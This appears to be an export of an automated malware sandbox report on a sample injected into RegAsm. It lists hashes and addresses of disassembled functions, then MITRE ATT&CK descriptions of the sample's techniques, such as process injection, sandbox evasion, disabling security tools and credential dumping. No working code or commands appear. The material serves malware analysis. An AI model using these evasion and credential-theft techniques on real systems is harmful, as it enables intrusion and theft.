Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc11f4431ba33a1423c9fc9fd7a21fbc670b50955701bcb9d428c4f422153e75
Instruction ID: 6c273ea02e039cf90e8c6d609397ea9426ef3847bed23bb37e57555476799d61
Opcode Fuzzy Hash: fc11f4431ba33a1423c9fc9fd7a21fbc670b50955701bcb9d428c4f422153e75
Instruction Fuzzy Hash: E19128356187118BD724DF28C89066FB7E2FF89704F19842DEAD587350DB79AC11CB86

Function 0042D094 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071efd9a32706174b45d9922456f33e020b1c24235017bbbd3c7a844c35154a2
Instruction ID: ae4821c78206fc18c9a21e24a02c8f8e75e2385da83acf66559414aacae328c3
Opcode Fuzzy Hash: 071efd9a32706174b45d9922456f33e020b1c24235017bbbd3c7a844c35154a2
Instruction Fuzzy Hash: F0B11871B04B408FD3148F38D8913AABFE2ABDA314F18896DD5EBCB392D639A405C715

Function 0043FCC0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
Instruction ID: d5e2c306aed0e9f0a4523fdea87c2092727505e879cf5e08cc8bb1e74fe301f1
Opcode Fuzzy Hash: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
Instruction Fuzzy Hash: 5E91D235A143018BD714DF18C850A2BB7E2FF99750F19A47EE9858B361EB34EC15CB8A

Function 0042AC85 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc99f1ea8dd95b641ae29ac04b67255957248eb76e99ea2c0302f70edc032d5
Instruction ID: 5c715e573053a1cdb4e5fa4ef26b00efae8e27eb9b2a0d2f1028ede51b356614
Opcode Fuzzy Hash: edc99f1ea8dd95b641ae29ac04b67255957248eb76e99ea2c0302f70edc032d5
Instruction Fuzzy Hash: 928116A0208B918FE325CF3584A07B3FBE1AF66304F44895DD1E78B792D7786509CB66

Function 0042AD52 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607095f51f498d4cdd328f3ca68107c8a85cb1257aa508e7c1c3551efdac5c54
Instruction ID: 51ee8208c54e5f907ed81fd1ac753b2c730ab59ac46561d93c145d6834228b11
Opcode Fuzzy Hash: 607095f51f498d4cdd328f3ca68107c8a85cb1257aa508e7c1c3551efdac5c54
Instruction Fuzzy Hash: 6C8104A0208B918FE325CF3584A07B3FBE1AF22304F58895DD1E74B792D7786509CB66

Function 0043CCB0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
Instruction ID: 2961eb3449e9620dd6c4faa6d90811a1abffc03b5a4c17fce246a2b98ba6e4df
Opcode Fuzzy Hash: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
Instruction Fuzzy Hash: 556147327047144BD714CA2DCC9172BB7A3EBC9320F29923DE9A56B3E1DA349C028794

Function 00428B00 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e01eaddd3b08cbcbafba57961538796ca2ecad021c3de853168ded57cf657d
Instruction ID: 6b217d0bde1c941cb29440435e39900910855c354c974b111997b1ea3d25e248
Opcode Fuzzy Hash: 74e01eaddd3b08cbcbafba57961538796ca2ecad021c3de853168ded57cf657d
Instruction Fuzzy Hash: 6B61E57171A3219BD714CE29E58031FBBE2ABD5350F94C82EF4888B391DB78EC45874A

Function 004305E0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a4950674ff51be32701087a92f60f8988aca3b497c671757a19ed72f3b0cb7
Instruction ID: 78800ab8aac1fb59ac3a91772dd1168650c4e97e239f027ea84cf732947084dc
Opcode Fuzzy Hash: 02a4950674ff51be32701087a92f60f8988aca3b497c671757a19ed72f3b0cb7
Instruction Fuzzy Hash: 01613837B199914BD714893C4C612A96E031BDB334B3DD3A6E8B58B3E9C66A8C078385

Function 00417DCE Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 777813bc824e7f9f1a13030218900535c02b1c991e4e2137c6b5396ddbeacc02
Instruction ID: a9b16b4475f58e573f81acb9b152bae0b804051a38340e7e18c151b462c0ccaf
Opcode Fuzzy Hash: 777813bc824e7f9f1a13030218900535c02b1c991e4e2137c6b5396ddbeacc02
Instruction Fuzzy Hash: 1C61433160C3508BC728CF18C885A6B77A3EFC5304F59896EE4924B256DB388C86C7CA

Function 00426122 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298089bc5c21a6ba1affffa752991ef76dc35099aaed327b80a8779f3d4e9f2a
Instruction ID: bf34161ed0b0b2cc0b27dc8ce60215efe85c3ee41267cb679ad9a634ed406dc1
Opcode Fuzzy Hash: 298089bc5c21a6ba1affffa752991ef76dc35099aaed327b80a8779f3d4e9f2a
Instruction Fuzzy Hash: E4511972A14B294BD719CE2DD86023AB2D2ABC5200F8A473DDD5B8B3C2DF75AC15C785

Function 00434D40 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f444a92e1affdee57848f95df307277b39aa4dc8594c659b45d49461fd2a1137
Instruction ID: ae04bbdf5937360d16f32479811ab3580af4a1633b7bc5b7c711c2fad65d9037
Opcode Fuzzy Hash: f444a92e1affdee57848f95df307277b39aa4dc8594c659b45d49461fd2a1137
Instruction Fuzzy Hash: 1F517DB16087548FE314DF29D49475BBBE1BBC8318F044A2EE5E987350E379DA088F86

Function 00436490 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebefbd2e81118e26db2bca344f504115a37fce991c450cc7815094b32cf2281a
Instruction ID: 19debb8a8d8565b76ee40dc244b2f2426bd5e4b62acc433009fbdb8ad7d8ecfd
Opcode Fuzzy Hash: ebefbd2e81118e26db2bca344f504115a37fce991c450cc7815094b32cf2281a
Instruction Fuzzy Hash: 4251907190C7556FCB258A2884903BFBBD29F99314F0A892EE4D64B386D23CDD05C785

Function 00405DE0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
Instruction ID: 0d33a859858de1e777918ecbbea9d87bf78b6d517e5369397cfe6a83e4d9b11e
Opcode Fuzzy Hash: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
Instruction Fuzzy Hash: 1051AE75A046019FC714DF18C480927B7A1FF89324F15467EF899AB392DA39EC42CF9A

Function 00409C61 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7139a7d65c172c95509649001ba5777967c86884962399ace91f58bab8b44ba7
Instruction ID: df614b7df28d3c373759bf57b018910391c4afda2941612bc8bfffe953c98c61
Opcode Fuzzy Hash: 7139a7d65c172c95509649001ba5777967c86884962399ace91f58bab8b44ba7
Instruction Fuzzy Hash: D651153610D380EFC7518F688880A5FBBE2BFDA300F48896DF584572A2D275D925DB57

Function 004269E0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
Instruction ID: 93b374079003cf47803463db6aed036ab20df5fd0c0726eead366e94e35a9902
Opcode Fuzzy Hash: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
Instruction Fuzzy Hash: 6D41DC74608311CBD3109F54E85236BB3F0FF96714F04892DE9859B3A1E7B8D944CB4A

Function 0040A070 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45645fe5c41b63afe76149a1f1d106a7e8655c1f0b71fd5b5b8261797b710ec6
Instruction ID: 95f36f4564cb873c363d7cd6bc568f58acadc4cf7d4da6ae083c5bfa51f704ac
Opcode Fuzzy Hash: 45645fe5c41b63afe76149a1f1d106a7e8655c1f0b71fd5b5b8261797b710ec6
Instruction Fuzzy Hash: 27516B3510D380EFC7518F689880A5FBBE2BFEA300F88496CF58417292D275C925DB57

Function 00438580 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
Instruction ID: 800bc67bdf34f8eb84e2d2acdca91b3e4e4a41be4a419d3d02d7bdb166052edc
Opcode Fuzzy Hash: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
Instruction Fuzzy Hash: AC3126765093108BD311CF19C88576BFBE0EBC9719F18A97DF4849B351CB7889068BDA

Function 0043C891 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcc36199403940a83253a96fab12d96fcba3aef18c5c2a31391f13bb79be9f0
Instruction ID: d2f0b950d21ff58b816a41e084a1073648ef7d24793602c8d934a06cdde71e84
Opcode Fuzzy Hash: bbcc36199403940a83253a96fab12d96fcba3aef18c5c2a31391f13bb79be9f0
Instruction Fuzzy Hash: DF21F6326082514BC308CB38989152BFBE79FCE324F1ED62E95A5C73A5DA34DE028744

Function 0043C311 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490733b1a4aa52fdf059a24f7c0a861914edbf54a8682e80a838b6b7f87f4633
Instruction ID: ff94eec30b7c39eff8cb10e2accd77b98b41e9c75808595e72d726dfc0923897
Opcode Fuzzy Hash: 490733b1a4aa52fdf059a24f7c0a861914edbf54a8682e80a838b6b7f87f4633
Instruction Fuzzy Hash: 5C31E375A047808FC735CF78C4E16A77BE2EB5A310F1988AEC8D397795C278A806D748

Function 00404D50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
Instruction ID: 4c073cf3540596e04badca7617fc7e9bc7deaedfcf28b63a0a35df37db274471
Opcode Fuzzy Hash: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
Instruction Fuzzy Hash: 5731A7B1604200DBD7559F19C88096BB7E1EFC4318F18893EE999A73C1D339DC52CB8A

Function 00419D70 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
Instruction ID: bb6f8750bbd66f049743e392adceb248b911c9de5a183c3136beb1899a1fcac4
Opcode Fuzzy Hash: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
Instruction Fuzzy Hash: 6821B6B1904211C7DB209F24D8213A7B3F2FFE5364F29861DE8995B390E7799881C785

Function 00438700 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
Instruction ID: 668cd533223910cd228620b75c64fe88c6fb7912326b3a219a5fe6b3fc7877d8
Opcode Fuzzy Hash: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
Instruction Fuzzy Hash: BA11E13AA153144BD7205A289D8073BB667EBDA752F39A47EE8842B345CB388C0183E5

Function 00432A10 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 0227e66d0875c2311f38e4fe89d52de8498e6a121306d11f672e0d7d7f24ec6b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3A115933A041E50FC3269D3C8500566BFE31B97634F28539AF0F98B2D2C2268D8B9318

Function 00428140 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
Instruction ID: 6336afc45053181afdc7446a70e9b56c12bbfa34acc44c348cd50f34c0f480c3
Opcode Fuzzy Hash: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
Instruction Fuzzy Hash: A40192B170231147E6209F52E8C573BB2A89F84708F08453EE8089B381EF79EC26C299

Function 004194AD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
Instruction ID: 5bd34d858dd06a56d78af1502e90c44f0a6944959865b12bf66644d78649c3bb
Opcode Fuzzy Hash: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
Instruction Fuzzy Hash: FF2122714083818FD735CF14D8506DFBBE2EB86304F00882DD89C9B262DB329A16CBC6

Function 00407210 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
Instruction ID: b9eed158d1a4c5a8f95884017e16127f008288ee18346c9cf546a7ae42f2f0ed
Opcode Fuzzy Hash: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
Instruction Fuzzy Hash: 54F0F62AB5C31A0BE620DEF99CC0827F3D6D7CA254B19423DF941D3391D479F80282A6

Function 0043B65F Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
Instruction ID: 3eef60f30b737d7551fafe8816eea61c88680f234307081c63391da5742a7ff7
Opcode Fuzzy Hash: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
Instruction Fuzzy Hash: 590171F4C10204BFCB50FFB9E9474AEBE34EB06251F50422AF8407724AD231451A8BEB

Function 0041F963 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
Instruction ID: 143535b4edc0e874a23990f2e6068331c86e6e446665e0b03c92cf62ce2225ea
Opcode Fuzzy Hash: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
Instruction Fuzzy Hash: 79B092A9C0A810C7E4113F11BD4E4AAB034891B209F042136E80A7A243B63AD61A40AF

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
